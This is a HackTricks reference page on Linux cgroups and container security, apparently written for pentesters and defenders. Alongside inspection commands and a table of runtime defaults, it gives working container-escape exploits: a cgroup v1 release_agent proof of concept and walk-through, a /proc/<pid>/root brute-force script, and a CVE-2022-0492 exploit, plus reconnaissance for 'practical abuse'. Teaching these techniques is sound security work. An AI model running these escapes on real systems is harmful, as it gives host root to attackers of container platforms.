cgroups.md (15145B)
1 --- 2 title: "cgroups" 3 section: "Linux" 4 sectionSlug: "linux-hardening" 5 sourcePath: "src/linux-hardening/containers-namespaces/container-security/protections/cgroups.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/containers-namespaces/container-security/protections/cgroups.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # cgroups 14 15 ## Overview 16 17 Linux **control groups** are the kernel mechanism used to group processes together for accounting, limiting, prioritization, and policy enforcement. If namespaces are mainly about isolating the view of resources, cgroups are mainly about governing **how much** of those resources a set of processes may consume and, in some cases, **which classes of resources** they may interact with at all. Containers rely on cgroups constantly, even when the user never looks at them directly, because almost every modern runtime needs a way to tell the kernel "these processes belong to this workload, and these are the resource rules that apply to them". 18 19 This is why container engines place a new container into its own cgroup subtree. Once the process tree is there, the runtime can cap memory, limit the number of PIDs, weight CPU usage, regulate I/O, and restrict device access. In a production environment, this is essential both for multi-tenant safety and for simple operational hygiene. A container without meaningful resource controls may be able to exhaust memory, flood the system with processes, or monopolize CPU and I/O in ways that make the host or neighboring workloads unstable. 20 21 From a security perspective, cgroups matter in two separate ways. First, bad or missing resource limits enable straightforward denial-of-service attacks. Second, some cgroup features, especially in older **cgroup v1** setups, have historically created powerful breakout primitives when they were writable from inside a container. 22 23 ## v1 Vs v2 24 25 There are two major cgroup models in the wild. **cgroup v1** exposes multiple controller hierarchies, and older exploit writeups often revolve around the weird and sometimes overly powerful semantics available there. **cgroup v2** introduces a more unified hierarchy and generally cleaner behavior. Modern distributions increasingly prefer cgroup v2, but mixed or legacy environments still exist, which means both models are still relevant when reviewing real systems. 26 27 The difference matters because some of the most famous container breakout stories, such as abuses of **`release_agent`** in cgroup v1, are tied very specifically to older cgroup behavior. A reader who sees a cgroup exploit on a blog and then blindly applies it to a modern cgroup v2-only system is likely to misunderstand what is actually possible on the target. 28 29 ## Inspection 30 31 The quickest way to see where your current shell sits is: 32 33 ```bash 34 cat /proc/self/cgroup 35 findmnt -T /sys/fs/cgroup 36 ``` 37 38 The `/proc/self/cgroup` file shows the cgroup paths associated with the current process. On a modern cgroup v2 host, you will often see a unified entry. On older or hybrid hosts, you may see multiple v1 controller paths. Once you know the path, you can inspect the corresponding files under `/sys/fs/cgroup` to see limits and current usage. 39 40 On a cgroup v2 host, the following commands are useful: 41 42 ```bash 43 ls -l /sys/fs/cgroup 44 cat /sys/fs/cgroup/cgroup.controllers 45 cat /sys/fs/cgroup/cgroup.subtree_control 46 ``` 47 48 These files reveal which controllers exist and which ones are delegated to child cgroups. This delegation model matters in rootless and systemd-managed environments, where the runtime may only be able to control the subset of cgroup functionality that the parent hierarchy actually delegates. 49 50 ## Lab 51 52 One way to observe cgroups in practice is to run a memory-limited container: 53 54 ```bash 55 docker run --rm -it --memory=256m debian:stable-slim bash 56 cat /proc/self/cgroup 57 cat /sys/fs/cgroup/memory.max 2>/dev/null || cat /sys/fs/cgroup/memory.limit_in_bytes 2>/dev/null 58 ``` 59 60 You can also try a PID-limited container: 61 62 ```bash 63 docker run --rm -it --pids-limit=64 debian:stable-slim bash 64 cat /sys/fs/cgroup/pids.max 2>/dev/null 65 ``` 66 67 These examples are useful because they help connect the runtime flag to the kernel file interface. The runtime is not enforcing the rule by magic; it is writing the relevant cgroup settings and then letting the kernel enforce them against the process tree. 68 69 ## Runtime Usage 70 71 Docker, Podman, containerd, and CRI-O all rely on cgroups as part of normal operation. The differences are usually not about whether they use cgroups, but about **which defaults they choose**, **how they interact with systemd**, **how rootless delegation works**, and **how much of the configuration is controlled at the engine level versus the orchestration level**. 72 73 In Kubernetes, resource requests and limits eventually become cgroup configuration on the node. The path from Pod YAML to kernel enforcement passes through the kubelet, the CRI runtime, and the OCI runtime, but cgroups are still the kernel mechanism that finally applies the rule. In Incus/LXC environments, cgroups are also heavily used, especially because system containers often expose a richer process tree and more VM-like operational expectations. 74 75 ## Misconfigurations And Breakouts 76 77 The classic cgroup security story is the writable **cgroup v1 `release_agent`** mechanism. In that model, if an attacker could write to the right cgroup files, enable `notify_on_release`, and control the path stored in `release_agent`, the kernel could end up executing an attacker-chosen path in the initial namespaces on the host when the cgroup became empty. That is why older writeups place so much attention on cgroup controller writability, mount options, and namespace/capability conditions. 78 79 Even when `release_agent` is not available, cgroup mistakes still matter. Overly broad device access can make host devices reachable from the container. Missing memory and PID limits can turn a simple code execution into a host DoS. Weak cgroup delegation in rootless scenarios can also mislead defenders into assuming a restriction exists when the runtime was never actually able to apply it. 80 81 ### `release_agent` Background 82 83 The `release_agent` technique only applies to **cgroup v1**. The basic idea is that when the last process in a cgroup exits and `notify_on_release=1` is set, the kernel executes the program whose path is stored in `release_agent`. That execution happens in the **initial namespaces on the host**, which is what turns a writable `release_agent` into a container escape primitive. 84 85 For the technique to work, the attacker generally needs: 86 87 - a writable **cgroup v1** hierarchy 88 - the ability to create or use a child cgroup 89 - the ability to set `notify_on_release` 90 - the ability to write a path into `release_agent` 91 - a path that resolves to an executable from the host point of view 92 93 ### Classic PoC 94 95 The historical one-liner PoC is:<sup>[[1]](#references)</sup> 96 97 ```bash 98 d=$(dirname $(ls -x /s*/fs/c*/*/r* | head -n1)) 99 mkdir -p "$d/w" 100 echo 1 > "$d/w/notify_on_release" 101 t=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab) 102 touch /o 103 echo "$t/c" > "$d/release_agent" 104 cat <<'EOF' > /c 105 #!/bin/sh 106 ps aux > "$t/o" 107 EOF 108 chmod +x /c 109 sh -c "echo 0 > $d/w/cgroup.procs" 110 sleep 1 111 cat /o 112 ``` 113 114 This PoC writes a payload path into `release_agent`, triggers cgroup release, and then reads back the output file generated on the host. 115 116 ### Readable Walk-Through 117 118 The same idea is easier to understand when broken into steps.<sup>[[1]](#references)</sup> 119 120 1. Create and prepare a writable cgroup: 121 122 ```bash 123 mkdir /tmp/cgrp 124 mount -t cgroup -o rdma cgroup /tmp/cgrp # or memory if available in v1 125 mkdir /tmp/cgrp/x 126 echo 1 > /tmp/cgrp/x/notify_on_release 127 ``` 128 129 2. Identify the host path that corresponds to the container filesystem: 130 131 ```bash 132 host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab) 133 echo "$host_path/cmd" > /tmp/cgrp/release_agent 134 ``` 135 136 3. Drop a payload that will be visible from the host path: 137 138 ```bash 139 cat <<'EOF' > /cmd 140 #!/bin/sh 141 ps aux > /output 142 EOF 143 chmod +x /cmd 144 ``` 145 146 4. Trigger execution by making the cgroup empty: 147 148 ```bash 149 sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs" 150 sleep 1 151 cat /output 152 ``` 153 154 The effect is host-side execution of the payload with host root privileges. In a real exploit, the payload usually writes a proof file, spawns a reverse shell, or modifies host state. 155 156 ### Relative Path Variant Using `/proc/<pid>/root` 157 158 In some environments, the host path to the container filesystem is not obvious or is hidden by the storage driver. In that case the payload path can be expressed through `/proc/<pid>/root/...`, where `<pid>` is a host PID belonging to a process in the current container. That is the basis of the relative-path brute-force variant:<sup>[[2]](#references)</sup> 159 160 ```bash 161 #!/bin/sh 162 163 OUTPUT_DIR="/" 164 MAX_PID=65535 165 CGROUP_NAME="xyx" 166 CGROUP_MOUNT="/tmp/cgrp" 167 PAYLOAD_NAME="${CGROUP_NAME}_payload.sh" 168 PAYLOAD_PATH="${OUTPUT_DIR}/${PAYLOAD_NAME}" 169 OUTPUT_NAME="${CGROUP_NAME}_payload.out" 170 OUTPUT_PATH="${OUTPUT_DIR}/${OUTPUT_NAME}" 171 172 sleep 10000 & 173 174 cat > ${PAYLOAD_PATH} << __EOF__ 175 #!/bin/sh 176 OUTPATH=\$(dirname \$0)/${OUTPUT_NAME} 177 ps -eaf > \${OUTPATH} 2>&1 178 __EOF__ 179 180 chmod a+x ${PAYLOAD_PATH} 181 182 mkdir ${CGROUP_MOUNT} 183 mount -t cgroup -o memory cgroup ${CGROUP_MOUNT} 184 mkdir ${CGROUP_MOUNT}/${CGROUP_NAME} 185 echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release 186 187 TPID=1 188 while [ ! -f ${OUTPUT_PATH} ] 189 do 190 if [ $((${TPID} % 100)) -eq 0 ] 191 then 192 echo "Checking pid ${TPID}" 193 if [ ${TPID} -gt ${MAX_PID} ] 194 then 195 echo "Exiting at ${MAX_PID}" 196 exit 1 197 fi 198 fi 199 echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent 200 sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs" 201 TPID=$((${TPID} + 1)) 202 done 203 204 sleep 1 205 cat ${OUTPUT_PATH} 206 ``` 207 208 The relevant trick here is not the brute force itself but the path form: `/proc/<pid>/root/...` lets the kernel resolve a file inside the container filesystem from the host namespace, even when the direct host storage path is not known ahead of time. 209 210 ### CVE-2022-0492 Variant 211 212 In 2022, CVE-2022-0492 showed that writing to `release_agent` in cgroup v1 was not correctly checking for `CAP_SYS_ADMIN` in the **initial** user namespace. This made the technique far more reachable on vulnerable kernels because a container process that could mount a cgroup hierarchy could write `release_agent` without already being privileged in the host user namespace.<sup>[[3]](#references)</sup> 213 214 Minimal exploit: 215 216 ```bash 217 apk add --no-cache util-linux 218 unshare -UrCm sh -c ' 219 mkdir /tmp/c 220 mount -t cgroup -o memory none /tmp/c 221 echo 1 > /tmp/c/notify_on_release 222 echo /proc/self/exe > /tmp/c/release_agent 223 (sleep 1; echo 0 > /tmp/c/cgroup.procs) & 224 while true; do sleep 1; done 225 ' 226 ``` 227 228 On a vulnerable kernel, the host executes `/proc/self/exe` with host root privileges. 229 230 For practical abuse, start by checking whether the environment still exposes writable cgroup-v1 paths or dangerous device access: 231 232 ```bash 233 mount | grep cgroup 234 find /sys/fs/cgroup -maxdepth 3 -name release_agent 2>/dev/null -exec ls -l {} \; 235 find /sys/fs/cgroup -maxdepth 3 -writable 2>/dev/null | head -n 50 236 ls -l /dev | head -n 50 237 ``` 238 239 If `release_agent` is present and writable, you are already in legacy-breakout territory: 240 241 ```bash 242 find /sys/fs/cgroup -maxdepth 3 -name notify_on_release 2>/dev/null 243 find /sys/fs/cgroup -maxdepth 3 -name cgroup.procs 2>/dev/null | head 244 ``` 245 246 If the cgroup path itself does not yield an escape, the next practical use is often denial of service or reconnaissance: 247 248 ```bash 249 cat /sys/fs/cgroup/pids.max 2>/dev/null 250 cat /sys/fs/cgroup/memory.max 2>/dev/null 251 cat /sys/fs/cgroup/cpu.max 2>/dev/null 252 ``` 253 254 These commands quickly tell you whether the workload has room to fork-bomb, consume memory aggressively, or abuse a writable legacy cgroup interface. 255 256 ## Checks 257 258 When reviewing a target, the purpose of the cgroup checks is to learn which cgroup model is in use, whether the container sees writable controller paths, and whether old breakout primitives such as `release_agent` are even relevant. 259 260 ```bash 261 cat /proc/self/cgroup # Current process cgroup placement 262 mount | grep cgroup # cgroup v1/v2 mounts and mount options 263 find /sys/fs/cgroup -maxdepth 3 -name release_agent 2>/dev/null # Legacy v1 breakout primitive 264 cat /proc/1/cgroup # Compare with PID 1 / host-side process layout 265 ``` 266 267 What is interesting here: 268 269 - If `mount | grep cgroup` shows **cgroup v1**, older breakout writeups become more relevant. 270 - If `release_agent` exists and is reachable, that is immediately worth deeper investigation. 271 - If the visible cgroup hierarchy is writable and the container also has strong capabilities, the environment deserves much closer review. 272 273 If you discover **cgroup v1**, writable controller mounts, and a container that also has strong capabilities or weak seccomp/AppArmor protection, that combination deserves careful attention. cgroups are often treated as a boring resource-management topic, but historically they have been part of some of the most instructive container escape chains precisely because the boundary between "resource control" and "host influence" was not always as clean as people assumed. 274 275 ## Runtime Defaults 276 277 | Runtime / platform | Default state | Default behavior | Common manual weakening | 278 | --- | --- | --- | --- | 279 | Docker Engine | Enabled by default | Containers are placed in cgroups automatically; resource limits are optional unless set with flags | omitting `--memory`, `--pids-limit`, `--cpus`, `--blkio-weight`; `--device`; `--privileged` | 280 | Podman | Enabled by default | `--cgroups=enabled` is the default; cgroup namespace defaults vary by cgroup version (`private` on cgroup v2, `host` on some cgroup v1 setups) | `--cgroups=disabled`, `--cgroupns=host`, relaxed device access, `--privileged` | 281 | Kubernetes | Enabled through the runtime by default | Pods and containers are placed in cgroups by the node runtime; fine-grained resource control depends on `resources.requests` / `resources.limits` | omitting resource requests/limits, privileged device access, host-level runtime misconfiguration | 282 | containerd / CRI-O | Enabled by default | cgroups are part of normal lifecycle management | direct runtime configs that relax device controls or expose legacy writable cgroup v1 interfaces | 283 284 The important distinction is that **cgroup existence** is usually default, while **useful resource constraints** are often optional unless explicitly configured. 285 286 ## References 287 288 - [1] [Understanding Docker container escapes](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/) 289 - [2] [Privileged Container Escape - Control Groups release_agent](https://blog.ajxchapman.com/posts/2020/11/19/privileged-container-escape.html) 290 - [3] [New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape?](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/)